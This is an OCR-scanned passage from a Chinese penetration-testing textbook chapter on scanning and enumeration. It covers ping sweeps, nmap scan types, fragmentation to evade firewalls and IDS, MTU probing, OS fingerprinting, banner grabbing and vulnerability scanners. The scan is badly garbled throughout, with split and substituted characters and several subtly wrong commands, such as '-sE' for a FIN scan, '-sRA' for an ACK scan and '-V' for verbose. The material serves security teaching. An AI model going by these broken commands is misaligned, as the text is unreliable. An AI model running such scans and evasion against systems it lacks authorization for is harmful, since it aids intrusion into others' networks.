应 均 为 主机 不 可 达 ， 说 明 要 么 是 网 址 /了 不 正确 ， 要 么 是 系统 未 局 动 。 

请 注意 : 虽然 主机 名 称 或 TP 地 址 都 可 以 用 于 ping 主 机 ， 但 在 大 多 数 情 况 下 应 该 使 
用 IP。 这 里 使 用 主机 名 仅 是 为 了 简化 说 明 。 在 实践 中 ， 可 能 会 出 现 用 IP 地 址 ping 能 得 
到 啊 应 而 用 主机 名 就 得 不 到 啊 应 的 情况 ， 这 将 会 导致 ( 仅 用 主机 名 ping 时 ) 认 为 系统 不 
可 用 ,然而 实际 上 它 却 是 可 用 的 。 如 有 果 你 还 记得 前 文 对 于 DNS 的 讨论 ， 那么 DNS 可 
能 会 关闭 从 而 不 允许 主机 按 名 称 解 析 ， 但 人 P 却 仍然 可 以 。 


ping 当 然 是 一 个 很 棒 的 工具 ， 但 还 有 其 他 工具 有 着 比 单 纯 的 ping 命 令 多 得 多 的 功能 。 
其 中 的 两 种 是 Angry IJP 和 nmap。 对 单个 主机 使 用 ping 即 可 ， 但 要 快速 方便 地 ping 多 个 系统 
则 比较 困难 。 为 了 简化 操作 ， 可 以 使 用 上 述 两 种 工具 之 一 来 获得 整个 子 网 的 信息 。Angry 
IP 的 过 和 面 如 图 6.2 所 示 。 
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图 6.2 Angry IP 


练习 6.2: 使 用 Angry IP 
本 练习 中 ， 将 使 用 Angry IP 检 查 是 否 有 和 多 个 活动 主机 。 要 进行 此 练习 ， 首 先 需 要 
在 www.angryip.org 处 下 载 并 安装 该 软件 。 安 装 完毕 后 ， 转 到 步骤 (1)。 
(1) 局 动 Anery IP。 
设置 项 中 输入 扫描 的 起 始 IP 和 终止 IP。 简 单 的 办 法 是 在 系统 上 运行 
ipconfig 命 令 ， 确 定 所 在 的 网 络 范 围 。 如 果 手 头 已 经 有 通过 以 前 信息 收集 所 擎 握 的 IP 
地 址 范围 ， 也 可 以 直接 使 用 它 。 对 于 本 次 练习 ， 也 可 以 使 用 Angry IP 的 默认 设置 。 
(3) 准备 好 之 后 ， 单 击 Start。 
(4) 扫描 将 在 数秒 之 后 完成 ， 可 以 查看 结果 对 话 框 ， 其 中 说 明了 扫描 了 多 少 主 
机 ， 以 及 其 中 有 多 少 是 活动 的 。 
Angry IP 被 公认 为 一 种 快速 高 效 的 扫描 右 ， 可 以 在 整个 网 络 范 围 内 快速 地 执行 
ping 扫 描 。 


下 面 进 入 下 一 个 层次 ,介绍 一 种 以 后 你 作为 一 名 渗透 测试 者 将 十 分 熟悉 的 工具 : 
nmap。 
nmap( 或 称 为 Network Mapper) 是 一 于 免费 的 用 于 网 络 发 现 的 实用 工具 ， 在 所 有 主流 操 
作 系 统 中 均 可 使 用 它 。 该 工具 用 于 从 网 络 清查 到 安全 审计 再 
> 霍 宇 本 书 成 义 有 时， 到 系统 监控 的 各 种 工作 中 。nmap 可 用 于 查 明 关于 操作 系统 、 
nmap 的 最 新 版 本 (7.01) 防火墙 及 许多 其 他 特征 属性 的 信息 。 根 据 此 时 的 目的 ， 在 此 
2015 年 12 月 发 布 。 
仅 涉 及 它 的 有 限 几 种 功能 。 
nmap 婚 有 命令 行 界 面 ， 也 有 被 称 为 Zenmap 的 图 形 界面 。 在 本 书 中 将 主要 使 用 Zenmap， 
同时 也 会 给 出 命令 行 的 参考 ， 这 样 你 就 能 对 两 者 都 熟悉 。 如 果 想 完全 发 挥 nmap 的 能 力 ， 
那么 有 时 必须 使 用 命令 行 。 许 多 nmap 的 选项 只 有 在 命令 行 模式 下 才能 够 调用 ， 而 无 法 通 


第 6 章 ， 扫 撕 和 枚 举 


过 Zenmap GUI 界面 使 用 。nmap 界 面 的 两 个 视图 如 图 6.3 和 图 6.4 所 示 。 
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练习 6.3: 使 用 nmap 执 行 ping 打 描 
本 练习 中 ， 将 使 用 nmap 对 一 个 子 网 进行 ping 扫 提 
(1) 在 Windows 系 统 中 ， 打 开 命 令 提示 符 。 
(2) 在 命令 提示 符 下 ,输入 以 下 内 容 : 
Nmap -sP <IP 地 址 或 范围 > 
例如 ， 对 于 笔者 的 网 络 ， 所 要 扫 搬 的 地 址 范围 是 这 样 的 : 
Nmap -SP 192.168.1.1-—45 


(3) 按 Enter 键 。 

等 答 几 秒 钟 ，nmap 将 会 返回 一 个 处 于 活动 或 在 线 状态 的 主机 列表 。 

如 采 该 命令 成 功 找 到 了 一 个 或 多 个 活动 主机 ， 它 将 为 每 个 主机 逐一 返回 一 条 信 
妃 ， 说 明 其 了 地 址 处 于 在 线 状态 ， 并 显示 其 MAC 地 址 和 网 卡 供应 商 ( 如 果 能 够 获取 这 
些 信 息 的 话 )。 


i， 查 明 其 中 的 活动 主机 。 


在 使 用 nmap 时 要 记 住 以 下 几 点 : 首先 ， 其 命令 是 大 小 写 敏感 的 ， 这 意味 着 当 看 到 带 
有 大 写 或 小 写字 母 的 命令 时 ， 需 要 严格 按 原 样 输入 ; 另外 ， 本 书 列 出 的 命令 虽然 是 使 用 
Windows 系 统 演 示 ， 也 同样 能 够 用 在 Linux、Unix 以 及 Mac OS 系统 上 。 


6.3 执行 端口 扫描 


当 定 位 活动 系统 之 后 ， 即 应 继续 通过 端口 扫描 对 这 些 系 统 进行 更 精确 的 目标 定位 。 简 
而 言 之 ， 端 口 扫描 是 一 种 判断 端口 是 “开启 ”还 是 “关闭 ”的 方法 。 如 果 一 个 端口 是 开启 
的 ， 它 就 能 接受 连接 ， 反 之 则 不 能 。 端 口 扫 描 就 像 是 通过 转动 每 个 端口 上 的 “ 门 把 手 ” 来 
判断 能 不 能 打开 它 (进而 获得 访问 权限 )。 

要 问 一 个 系统 (如 一 个 Web 服 务 器 ) 上 的 某 个 特定 服务 发 
eg 送信 息 ， 需 要 连接 其 IP 地 址 以 及 端口 。 在 Web 服 务 器 场景 
da 案例 中 ， 对 于 IP 地 址 192.168.14.42 而 言 ， 目 标 系 统 形 如 : 
ee 192.168.14.42:80. 

用 程序 使 用 TCP 协 议 收发 在 本 例 中 ， 首 先 连接 IP 地 址 ， 然 后 再 向 冒号 (:) 后 给 出 
数据 ， 它 将 连接 并 绑 定 ”的 80 端 口 发 起 连接 。 这 种 IP 地 址 和 端口 的 结合 通常 被 称 为 套 
到 TCP 站 日 。 如 本 它 使 用 接 字 或 网 络 套 接 字 。 两 个 系统 通过 套 接 字 通 信 的 框图 如 图 6.5 
UDP 协议 来 收发 数据 ， 它 。 所 示 ，。 

将 使 用 UDP 端口 。 
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tcp 192.168.5.1: 3000 一 tcp 192.168.5.240: 25 


tcp 192.168.5.1: 3001 一 tcp 192.168.5.240: 25 
图 6.5 两 个 系统 间 的 套 接 字 


知名 端口 是 指 那些 在 日 常 操作 中 最 常用 的 端口 ， 其 范围 是 0~1023。 注 册 端 口 的 范围 是 
1024~49151， 它 们 是 除了 知名 端口 以 外 被 认定 为 可 供 其 他 应 用 程序 使 用 的 端口 。 动 态 端 口 
的 范围 是 49152~65535， 它 们 用 于 支持 在 前 两 个 端口 范围 中 没有 正式 注册 的 应 用 程序 
流量 。 

系统 上 的 端口 可 以 是 TCP 或 UDP 连 接 ， 而 连接 的 形式 能 够 决定 服务 的 形式 。 在 进行 
扫描 时 ， 应 记录 端口 号 以 及 端口 是 TCP 的 还 是 UDP 的 ， 以 备 后 用 。 作 为 一 种 面向 连接 的 协 
议 ，TCP 要 先 建立 连接 ， 然 后 验证 每 条 消息 ( 称 为 数据 包 ) 是 否 按 正确 的 顺序 到 达 目 的 端 。 
为 实现 此 功能 ，TCP 采 用 了 三 次 握手 机 制 ， 如 图 6.6 所 示 。 


图 6.6 ”TITCP 三 次 握手 


三 次 握手 完全 没有 考虑 安全 性 。 有 时 会 错误 地 认为 确认 请 求 的 动作 用 于 解决 安全 问 

但 实际 上 并 非 如 此 。 此 外 要 记 住 ，TCP 采 用 三 次 握手 ， 而 UDP 则 没有 。 

握手 过 程 中 双方 交互 的 步骤 如 下 : 

(1) A 发 送 一 个 SYN 包 到 B， 作 为 建立 连接 的 请 求 。 

(2) B 应 答 一 个 SYN-ACK 包 ， 作 为 对 请 求 的 确认 。 

(3) A 返回 一 个 最 终 的 ACK 包 来 应 答 ， 从 而 完全 建立 连接 。 

与 TCP 不 同 ，UDP 提 供 的 用 于 确保 信息 正确 到 达 目 的 地 的 保护 措施 很 少 。UDP 并 不 假 

定 需 要 进行 错误 检查 ， 而 是 交 由 应 用 程序 默认 确定 或 由 配置 应 用 程序 的 用 户 来 确定 。 
UDP 是 一 种 无 状态 协议 。 无 状态 意味 着 该 协议 将 每 个 对 信息 的 请 求 视 为 其 各 自 独 立 的 

事务 。 虽 然 这 似乎 增加 了 资源 消耗 ， 但 实际 上 恰恰 相反 ， 因 为 系统 不 再 需要 持续 跟踪 进行 

中 的 会 话 ， 从 而 能 占用 数据 包 中 更 少 的 数据 空间 。 


可 
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基础 学 习 暂 时 告 一 段落 ， 现 在 聚焦 到 这 两 种 协议 的 知识 如 何 运 用 上 来 ， 首 先 从 使 用 
TCP 进 行 端口 扫描 开始 。TCP 协 议 使 用 标志 位 来 通知 接收 方 如 何 处 理 通信 。 每 个 TCP 数 据 包 
中 都 有 标志 位 ， 按 照 特定 情况 需求 “开启 ”或 “关闭 ”。 一 些 TCP 协 议 标 志 位 如 表 6.1 所 示 。 

表 6.1 不 同 的 TCP 标 志 位 


SYN 用 于 初始 化 两 个 不 同 主机 之 间 的 连接 ， 以 进行 通信 

ACK 用 于 确认 接收 到 一 个 数据 包 信息 

URG 声明 数据 包 中 的 数据 应 立即 处 理 

PSH 指示 发 送 系 统 立 即 发 送 所 有 缓冲 区 数据 

FIN 通知 远程 系统 将 不 再 向 其 发 送 更 多 信息 。 大 体 上 它 等 于 完全 关闭 一 个 连接 
RST 重 置 数据 包 ， 用 于 重 置 连接 


现在 你 已 经 理解 了 何谓 问 口 扫 摘 ， 下 文 将 介绍 可 开展 的 几 种 不 同类 型 的 扫描 。 


6.3.1 全 开 扫 摘 ( 疡 口 扫 摘 ) 


TCP 连 接 扫描 (或 称 全 开 扫描 ) 是 在 目标 系统 端口 上 执行 三 次 握手 以 确定 哪些 端口 开放 
和 关闭 的 另 一 种 表达 方式 。 

使 用 全 开 连 接 的 好 处 是 ， 在 扫描 过 程 中 能 够 立即 获得 该 端口 打开 或 关闭 状态 的 正 反 
馈 。 然 而 ， 此 种 扫描 方式 有 一 个 缺点 ， 这 要 从 对 三 次 握手 的 使 用 说 起 。 谨 记 三 次 握手 的 目 
的 是 确认 双方 都 要 进行 通信 。 如 果 双 方 都 在 确认 其 存在 和 在 连接 中 的 角色 ， 那 么 所 有 人 均 
能 知道 双方 的 存在 及 其 身份 。 因 此 ， 当 建立 和 确认 全 开 连 接 时 ， 过 程 将 是 非常 “ 吵 闸 ” 
的 ， 因 而 也 易于 被 探测 到 。 

当 不 再 需要 该 连接 时 ， 连 接 发 起 方 将 变换 三 次 握手 过 程 ， 将 其 最 后 一 步 改 为 
ACK+RST， 从 而 切断 连接 。 该 过 程 检测 端口 的 打开 和 关闭 的 原理 如 图 6.7 所 示 。 


端口 为 开局 状态 
图 6.7 ”关闭 与 开局 端口 的 啊 应 


对 于 一 个 打开 的 端口 ， 其 响应 与 正常 的 三 次 握手 一 样 ， 而 对 于 一 个 关闭 的 端口 ， 其 
啊 应 只 有 一 个 RST 包 。 了 解 了 啊 应 模式 ， 就 能 够 准确 判断 端口 的 开启 /关闭 状态 。 要 使 用 


nmap 运 行 一 个 全 开 扫 朱 ， 在 命令 行 中 得 入 以 下 命令 : 


nmap -sT -V < 目标 IP 地 址 > 


6.3.2 ”隐蔽 扫描 ( 半 开 扫描 ) 


在 此 类 扫描 中 ， 过 程 与 全 开 扫 描 很 相似 ， 但 有 些 不 同 之 
处 使 得 它 更 为 隐蔽 。 它 与 我 们 之 前 所 讨论 的 扫描 类 型 的 主要 
区 别 在 于 最 后 一 步 : 全 开 扫 描 采 用 三 次 握手 ， 而 半 开 扫描 仪 
进行 前 两 步 ， 最 后 一 步 则 只 是 发 送 一 个 RST 包 ， 实 际 上 在 连 
接 完 全 建立 之 前 就 将 其 关闭 。 为 何 这 样 做 即 可 知道 端口 是 开 
启 还 是 关闭 的 ? 只 要 第 二 步 返回 SYN-ACK 包 就 能 说 明 端 口 是 
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”你 可 能 会 注意 到 在 多 
个 nmap 例 子 中 都 使 用 了 -v 
开关 。 该 开关 虽 非 必需 ， 
却 非 常 有 用 ， 因 为 该 开关 
能 够 提供 一 些 不 使 用 它 则 
无 法 获取 的 附加 信息 。 实 
际 上 ， 此 开关 开启 的 就 是 
所 谓 的 “详细 模式 ”， 这 
一 名 字 可 清楚 说 明 其 在 扫 
描 中 的 作用 。 


开启 的 (这 正 古 我 们 所 需 的 )， 而 不 需要 最 后 啊 应 ACK 包 ， 因 为 只 进行 了 一 半 的 连接 过 程 。 
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端口 关闭 时 情况 则 和 前 文 所 述 相 同 ， 扫描 者 发 送 一 个 SYN 开 局 三 次 握手 ， 只 会 


导致 被 扫 揪 者 回复 一 个 RST 包 ， 表 明 端 口 是 关 闭 的 ， 不 接受 连接 。 使 用 半 开 扫描 检测 打开 


和 关闭 端口 的 方法 原理 如 图 6.8 所 示 。 


图 6.8 使 用 半 开 扫 摘 检测 端口 开 财 状态 


半 开 或 称 隐蔽 扫描 的 优点 是 降低 了 触发 检测 机 制 的 可 能 性 ， 而 缺点 则 是 可 靠 性 与 全 开 
扫描 相 比 略 有 不 及 ， 因 为 在 其 过 程 中 没有 收 到 确认 ; 半 开 扫描 的 另 一 个 缺点 是 某 些 情况 下 


会 略 慢 ， 不 过 这 一 影响 通常 很 小 。 
可 使 用 下 面 的 命令 执行 半 开 扫描 : 


nmap -sS -V < 目标 IP 地 址 > 
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这 种 扫描 有 时 也 被 称 为 “圣诞 树 ” 包 (Christmas tree packet)、“ 神 风 特 攻 ” 包 
(kamikaze packet)、“ 丑 恶 报 文 ”(nastygram) 或 者 “灯泡 测试 段 ”(lamp test segmenb， 但 
“圣诞 树 扫 描 ” 大 概 是 最 为 通用 的 名 称 。 该 类 型 扫描 中 设置 了 多 个 标志 位 ， 也 就 是 说 发 送 
到 客户 端的 数据 包 中 同时 设置 了 SYN、PSH、URG 和 FIN 等 标志 位 。 所 有 这 些 标志 位 同时 
都 被 设置 所 带 来 的 问题 是 产生 了 不 合 逻 辑 或 不 合法 的 标志 位 组 合 ， 这 给 接收 端 系 统 带 来 了 
厅 烦 ， 因 为 它 必须 确定 如 何 去 做 。 当 前 的 大 多 数 系统 会 简单 地 忽略 或 丢弃 该 数据 包 ， 但 是 
在 某 些 系统 上 ， 对 此 数据 包 无 啊 应 表明 端口 是 打开 的 ， 而 返回 一 个 RST 包 则 表明 端口 是 关 
闭 的 。 该 扫描 过 程 如 图 6.9 所 示 。 


症 口 为 开局 状态 
图 6.9 圣诞树 扫 描 
用 nmap 执 行 圣 诞 树 扫描 很 简单 ， 只 需要 在 命令 行 中 输入 以 下 命令 : 


nmap -ssX -Vv < 目标 IP 地 址 > 


6.3.4 FIN 扫 摘 


当 攻 击 者 癌 受 害 者 发 送 一 个 设置 了 FIN 标 志 位 的 请 求 时 ， 融 发 起 了 一 次 FIN 扫 描 。 思 
考 一 下 ， 当 一 个 带 FIN 标 志 位 的 数据 包 被 发 送出 去 时 会 发 生 什 么 ; 该 包 请 求 关闭 连接 ， 因 
为 没有 更 多 信息 需要 发 送 。 这 一 行为 的 结 采 就 是 ， 如 果 端 口 是 关 闭 的 ， 则 目标 系统 不 会 返 
回 啊 应 ， 但 如 果 闯 口 是 打 开 的 ， 则 会 返回 一 个 RST 包 ， 和 和 双 诞 树 扫描 十 分 相似 。 扫 描 过 程 
如 图 6.10 所 示 。 

使 用 以 下 命令 即 可 执行 FIN 扫 插 : 


Nmap -sE < 目标 IP 地 址 > 
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会 FIN 标 志 位 数据 包 + 端 口号 > 


无 响应 
端口 为 开启 状态 


图 6.10 ”FIN 扫 撞 


6.3.5 NULL 扫 摘 


NULIL 扫描 是 另 一 种 有 趣 的 扫描 ， 它 与 圣诞 树 扫描 正好 相反 。 执 行 NULL 扫 描 时 ， 发 
送 一 个 未 设置 任何 标志 位 的 数据 包 ， 可 根据 返回 结果 判 端 口 是 打开 的 还 是 关闭 的 。 打 开 
的 端口 将 不 会 返回 啊 应 ， 而 关闭 的 端口 将 同样 ( 像 圣 诞 树 扫描 一 样 ) 返 回 一 个 RST 包 ， 如 
图 6.11 所 示 。 


无 标志 位 数据 包 + 端 口号 


病 口 为 开局 状态 
图 6.11 ” NULL 扫描 


要 在 nmap 中 执行 NULL 扫 描 ， 可 执行 以 下 命令 : 


nmap -sN < 目标 IP 地 址 > 


6.3.6 ” ACK 扫 摘 


ACK 扫 摘 是 另 一 种 对 标志 位 进行 设置 的 有 趣 变 体 ， 用 于 测试 是 否 存 在 防火 场 形式 的 过 
小 上 器。 防火墙 会 对 一 个 网 络 到 男 一 个 网 络 (例如 从 Internet 到 本 地 局 域 网 ) 的 流量 进行 过 小 。 

从 网 络 外 部 看 来 ， 并 不 能 肯定 地 判断 是 否 存 在 防火 墙 (尤其 是 黑 盒 测试 中 )， 因 此 需要 
一 种 解决 该 问题 的 方法 ， 而 ACK 扫 描 正 是 其 中 一 种 。 在 该 类 型 扫描 中 ， 将 向 目标 发 送 一 个 
带 有 ACK 标 志 位 的 数据 包 。 如 果 这 个 发 给 扫描 目标 的 ACK 请 求 没有 返回 响应 ,说明 防火 
墙 存 在 且 正 在 进行 过 滤 ; 而 收 到 扫描 目标 返回 的 RST 包 则 说 明 没有 进行 过 滤 。ACK 扫 描 的 
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过 程 如 图 6.12 所 示 。 


含 ACK 标 志 位 数据 包 + 端 口号 


带 有 正 滑 窗 尺 寸 的 RST 包 
并 口 为 开局 状态 
图 6.12 ”进行 中 的 ACK 扫 描 


要 在 nmap 中 执行 ACK 扫 描 ， 使 用 以 下 命令 : 


nmap -sRA < 目标 IP 地 址 > 二 在 此 已 介绍 了 了 nmap 的 
一 些 非常 基础 的 设置 ， 但 
该 应 用 程序 的 功能 比 本 书 


6.3.7 ”分 段 扫描 中 所 介绍 的 要 强大 得 多 。 
- 不 过 ,也 有 一 些 简单 的 先 

说 到 防火 墙 和 其 他 防御 机 制 ， 怎 样 才能 进 开 或 骗 过 这 些 。 人 二 
设备 呢 ? 使 用 数据 包 分 段 即 为 方法 之 一 。 分 段 将 一 个 数据 包 标 时 ， 可 以 输入 下 地 址 范 
分 解 成 多 个 片段 ， 防止 检测 设备 发 现 原始 的 未 分 段 数 据 包 的 围 ， 如 192.168.1.1~200， 
意图 。 可 将 其 想象 成 类 似 将 一 幅 大 图 画 切 分 成 许多 小 块 的 拼 。” 即 可 扫描 从 1 到 200 的 所 有 
图 玩具 ， 如 果 预 先 不 知道 原始 图 画 的 模样 ， 那 就 只 是 一 堆 色 ” 地址。 另外 一 个 例子 是 ， 
块 碎片 ， 必 须 重 新 组 装 起 来 才能 看 到 图 画 。 分 段 操作 的 示意 ”使 用 表达 式 192.168.1.1/24 


到 如 图 6.13 所 示 。 则 能 够 扫 拉 其 代表 的 整个 
C 尖 了 于 网 。 
包 分 段 
原始 包 


分 段 1 分 段 分 段 3 分 段 4 
图 6.13 ”被 分 段 的 数据 包 


这 就 引出 一 个 问题 : 如 何 知道 数据 包 何 时 将 进行 分 段 ? 最 大 传输 单元 (MTU) 是 指 将 数 
据 包 分 段 之 前 所 能 达到 的 最 大 尺寸 。 那 义 如 何 确定 MTU 呢 ?下 面 将 使 用 ping 加 上 一 些 基 础 
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的 知识 确定 MTU 值 。 

首先 ， 以 太 网 的 MTU 是 1500， 这 对 许多 网 络 是 通用 设置 ， 特 别 是 中 小 型 网 络 。 而 要 
是 涉及 非 以 太 网 链 路 的 其 他 网 络 (如 DSL)， 则 可 能 会 涉及 不 同 的 MTU 值 。 当 网 络 设备 遇 到 
大 于 MTU 的 数据 包 时 ， 将 可 能 有 两 种 输出 : 

@ 如 果 该 数据 包 设 置 了 “不 分 段 ” 标 志 位 ， 设 备 将 丢弃 数据 包 并 回复 错误 信息 。 

@ 如 果 该 数据 包 未 设置 “不 分 段 ” 标 志 位 ， 设 备 将 把 数据 包 分 成 相同 但 较 小 的 分 

段 ， 以 适应 链 路 对 MTU 的 要 求 。 

现在 介绍 如 何 获 得 主机 间 链 路 的 MTU， 此 处 以 Web 站 点 为 例 。 下 面 的 示例 中 将 测试 到 
samus.com 的 MTU。 要 实现 该 目标 ， 需 要 使 用 带 -f 和 -1 开关 的 ping 命 令 ， 前 者 表示 不 分 段 ， 
后 者 用 于 指定 数据 包 大 小 。 

按照 一 般 方式 ping samus.com 的 话 ， 将 看 到 如 下 结果 : 

ping samus .com 

pinging 131.107.8.1 with 1450 bytes of data: 

Reply from 131.107.8.1: bytes=1450 time<10ms TTL=32 

Reply from 131.107.8.1: bytes=1450 time<10ms TTL=32 

Reply from 131.107.8.1: bytes=1450 time<10ms TTL=32 

Reply from 131.107.8.1: bytes=1450 time<10ms TTL=32 

ping statistics for 131.107.8.1: 

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 
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Minimum = Oms, Maximum = lO0ms, Average = 2ms 

以 上 是 常规 输出 ， 如 果 想 确定 MTU 该 如 何 做 ? 

在 Windows 命 令 提 示 符 中 ， 输 入 以 下 命令 并 按 回 车 键 : 

ping -f -1 1472 www.samus .com 

通常 ， 该 操作 会 返回 一 条 消息 ， 表 明 数 据 包 需 要 被 分 段 。 此 时 ， 将 值 1472 减 去 10 并 循 
环 执 行 该 操作 ， 直 到 “packet needs to be frasmented( 数 据 包 需要 分 段 )” 错 误 消 息 消 失 ; 然 
后 再 每 次 将 数值 加 1， 直 到 再 次 加 1 就 会 引发 packet needs to be fragmented 错 误 消 息 为 止 ， 引 
发 错误 前 的 值 即 为 最 大 MTU 值 。 

获取 了 该 数值 后 ， 将 其 加 上 28 即 为 无 须 分 段 的 最 大 MTU 尺 寸 。 如 果 在 端口 扫描 时 创 
建 的 数据 包 尺 寸 大 于 该 值 ， 就 需要 对 该 数据 包 分 段 。 加 上 的 28 是 TCP/IP 协 议 在 数据 包 中 
附加 的 28 个 字 节 ， 因 此 如 果 之 前 测 得 的 值 是 1472， 加 上 28 后 就 将 重 现 前 文 所 述 的 “神奇 数 
字 ”1500 字 节 。 

在 nmap 中 ， 如 要 对 数据 包 分 段 ， 可 使 用 -f 开 关 ， 方 法 如 下 : 


nmap -sS -f < 月 标 IP 地 址 > 
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6.3.8 UDP 扫 白 


到 目前 为 止 ， 上 文 讨 论 的 所 有 技术 都 以 使 用 TCP 为 前 提 且 仅 适 用 于 TCP 协 议 ， 如 果 转 
而 使 用 UDP 协议 会 怎么 样 呢 ? 那么 就 得 改变 思路 和 方法 了 。 

要 了 解 的 第 一 件 事情 就 是 在 UDP 扫描 中 ， 当 端口 打开 或 者 关闭 时 会 发 生 什 么 。 需 要 
记 住 ，TCP 通 过 确认 和 标志 位 来 描述 流量 。 但 UDP 并 不 如 此 ， 而 是 在 流量 发 送出 去 以 后 就 
假定 它 已 被 收 到 。 目 前 为 止 所 讨论 的 扫描 都 基于 TCP， 是 通过 啊 应 来 判定 端口 的 开启 和 关 
闭 ; 然而 ， 由 于 没有 标志 位 和 响应 ，UDP 必 须 采 用 不 同 的 方法 ， 如 表 6.2 所 示 。 

表 6.2 ”对 开启 和 关闭 端口 的 UDP 扫 描 结果 


端口 状态 结果 
打开 无 啊 应 
关闭 返回 ICMP 病 口 不 可 访问 消 轧 


6.4 ”识别 操作 系统 


目前 你 已 经 类 有 积累 ， 能 够 识别 系统 上 打开 或 关闭 的 器 口 ， 但 现在 需要 获取 更 多 信 
恩 : 目标 主机 上 运行 的 是 什么 操作 系统 。 就 像 人 一 样 ， 每 种 操作 系统 也 有 将 它 与 其 他 操作 
系统 区 分 开 的 独特 “指纹 ”。 这 一 步 的 目标 就 是 找 出 那些 可 表明 存在 何 种 操作 系统 的 
指纹 识别 方法 可 以 归 为 两 类 : 主动 的 和 被 动 的 。 两 种 方法 的 对 比如 表 6.3 所 示 。 
表 6.3 ”主动 和 被 动 的 指纹 识别 方法 


被 动 的 
工作 原理 使 用 特殊 构造 的 数据 包 使 用 嗅 探 技术 抓 取 来 自 目标 系统 的 数据 包 


分 析 方 法 将 啊 应 结果 同 已 知 啊 应 的 数据 库 比较 ”| 分 析 啊 应 以 寻找 操作 系统 细节 信息 
被 发 现 的 概率 ”| 高 ， 因 为 是 癌 网 络 发 送 流量 低 ， 因 为 噢 探 本 身 的 特性 


一 种 检测 操作 系统 类 型 的 方法 是 再 次 使 用 nmap， 但 使 用 不 同 的 开关 选项 : 使 用 nmap 
的 -O 开 关 执 行 对 OS 的 检测 ， 具 体 如 下 : 


nmap -sS -0O <IP 地 址 > 


nmap 将 笠 试 通过 仔细 检查 返回 的 流量 和 各 个 目标 的 咽 应 ， 检 测 远程 操作 系统 的 版 本 。 


banner 抓 取 


识别 系统 及 其 上 服务 的 第 一 个 方法 是 所 谓 的 “banner 抓 取 ”。 通 常 ， 该 技术 是 通过 使 
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用 一 种 称 为 Telnet 的 协议 ， 获 取 目 标 系统 信息 ， 发 现 服务 的 (理想 情况 下 还 有 操作 系统 的 ) 
特征 。 使 用 Telnet 对 80 端 口 进行 banner 抓 取 的 结果 如 图 6.14 所 示 。 

Telnet 是 一 个 用 于 TCP/P 网 络 的 终端 仿真 程序 。Telnet 程 序 将 一 个 系统 连接 到 另 一 个 
系统 ， 使 用 户 可 以 远程 运行 命令 ， 就 像 直接 进入 了 目标 系统 一 样 。Telnet 用 于 远程 管理 服 
务 器 、 路 由 器 和 其 他 系统 。 在 许多 情况 下 ， Telnet 被 视 为 不 安全 的 ， 并 正在 逐步 被 SSH( 即 
Secure She]) 等 蔡 代 方案 淘汰 。 


C\Windows\system32\cmd.exe 


IIPAi.1 209 OX 
ontent—Length: ?81 
bontent—Type: text/htnm]l 
Last=MNodif ied: he i6 Dec 2013 ili8:20:46 GMI 
Accept— Ranges : 
: 169das pacel: 


ASP .NET 
18 Dec 2013 B22:08:48 GHI 
ONNection: close 


nnect1ion to host lost. 


"Users™“root> 


图 6.14” ”banner 抓 取 的 结果 


那么 ， banner 是 什么 ， 为 什么 要 关心 它 ? banner 是 某 个 服务 在 应 用 程序 对 该 服务 请 求 
信息 时 返回 的 内 容 。 在 此 ， 服 务 就 是 在 特定 端口 (如 HTTP 的 80 端 口 、FTP 的 21 端 口 ) 上 响应 
请 求 的 程序 。banner 展 示 的 信息 可 能 多 种 多 样 ， 就 HTTP 的 情况 而 言 ， 则 会 包括 服务 软件 
类 型 、 版 本 号 、 最 后 修改 时 间 和 其 他 类 似 信息 。 


练习 6.4: 用 Telnet 抓 取 banner 
要 通过 Telnet 从 系统 中 抓 取 banner， 可 使 用 以 下 命令 打开 一 个 到 远程 客户 奖 的 
Telnet 连 接 ， 以 获取 服务 banner。 

(1) 打开 命令 提示 符 。 

(2) 在 命令 提示 符 中 输入 以 下 命令 

telnet < 目标 IP 地 址 或 主机 名 称 > 80 


(3) 全 看 : 结 末 。 

返回 结果 会 根据 第 (2) 步 输入 的 地 址 或 目标 而 有 所 不 同 ， 不 过 一 般 来 说 可 得 到 类 
HTTP/1.1] 200 OK 

Date: Mon, 11 May 2009 22:10:40 EST 

Server: IIS/7.0 (Windows Server 2012) 


1 ; 参 j 却 测 j 陈 入 | ] 实 r% 


Tast-Modlifed: Thu，22 Feb 2015 11:20:14 PST 
ETag: “1986-69b-123a4bc6- 

Accept-Rangdes: bytes 

Content-Length: 1110 


Connectijon: close 

Content-Type: text/html 

如 果 仔 细 观 察 本 例 中 结果 的 输出 ， 将 会 注意 到 标记 了 Server 的 那 一 行 包含 了 服务 
器 类 型 的 信息 。 该 信息 虽然 看 似 对 目标 系统 无 害 ， 但 在 下 一 步 确定 攻击 目标 时 却 是 
有 用 的 。 


还 有 其 他 方法 能 够 获取 操作 系统 或 服务 的 信息 ， 值 得 花 点 时 间 浏 览 的 banner 抓 取 工 
具有 : 

Netcraft ”这 是 一 款 在 线 工 具 ， 设 计 用 于 收集 关于 服务 器 和 Web 服 务 器 的 信息 。 

IDServe 这 是 一 球 专 为 Web 服 务 器 指纹 识别 而 设计 的 工具 ， 可 从 https://www.grec.com/ 
intro.htm 处 下 载 获 取 。 


6.S ”漏洞 扫描 


漏洞 扫描 是 男 一 个 可 用 于 获取 目标 信息 的 选项 ， 但 隐蔽 性 弱 了 不 少 。 大 至 上， 漏洞 
扫描 器 是 一 类 则 在 识别 操作 系统 和 应 用 程序 中 弱点 的 自动 化 工具 。 这 些 工具 是 通过 检查 编 
码 、 端 口 、 变 量 、banner 以 及 诸多 其 他 可 能 存在 问题 的 领域 来 实现 其 功能 的 。 漏 洞 扫 描 器 
的 工作 原理 与 杀毒 软件 类 似 ， 是 将 它们 的 发 现 与 定期 更 新 的 已 知 问 题 数 据 库 进 行 比 较 。 

从 能 够 快速 检查 很 多 已 知 问题 方面 考虑 ， 漏 洞 扫 描 器 很 有 帮助 ， 而 在 开展 漏洞 评估 
时 ， 由 于 其 速度 较 快 旦 测试 人 员 具 有 访问 权 ， 漏 洞 扫 描 器 也 是 很 有 用 的 。 然 而 ， 它 们 也 可 
能 是 有 害 的 ， 因 为 它们 无 法 发 现 所 有 潜在 问题 ， 设 计 也 没有 考虑 隐蔽 性。 所 以 ， 如 果 要 模 
拟 真 实 的 攻击 ， 漏 洞 扫描 器 也 许 不 是 最 佳 选 择 一 一 这 可 能 会 触发 IDS/IPS 告 警 。 

还 有 一 点 需要 着 重 指 出 ， 即 对 于 大 多 数 安全 专业 人 员 而 言 ， 渗 透 测试 和 漏洞 评估 并 非 
